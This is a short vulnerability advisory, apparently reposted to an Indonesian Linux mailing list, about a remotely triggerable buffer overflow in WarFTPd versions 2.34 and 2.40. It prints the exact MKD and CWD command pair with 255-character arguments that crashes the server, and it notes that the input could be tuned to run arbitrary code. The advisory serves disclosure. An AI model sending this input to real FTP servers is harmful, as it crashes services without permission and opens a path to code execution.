WFTPd vulnerable to a remotely exploitable buffer overflow
----------------------------------------------------------------------------
----
SUMMARY
There is a remotely exploitable buffer overflow in WarFTPd's FTP Server.
This can be easily exploited to overflow the WarFTPd's command buffer,
causing it to crash and possibly execute arbitrary code.
DETAILS
Vulnerable systems:
WFTPD v2.34
WFTPD v2.40
The vulnerabilities are the conjunction of two large commands; the MKD and
CWD. If these two commands are issued one after the other, with an
argument that consists of 255 characters, the WarFTPd will crash (This can
be fine-tuned to execute arbitrary code).
Example:
First command
MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(NOTE: The line was wrapped for easier reading)
Second command
CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(NOTE: The line was wrapped for easier reading)
ADDITIONAL INFORMATION
This vulnerability has been discovered by: <mailto:[EMAIL PROTECTED]>
Luciano Martins.
========================================
-------
AFLHI 058009990407128029/089802---(102598//991024)
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
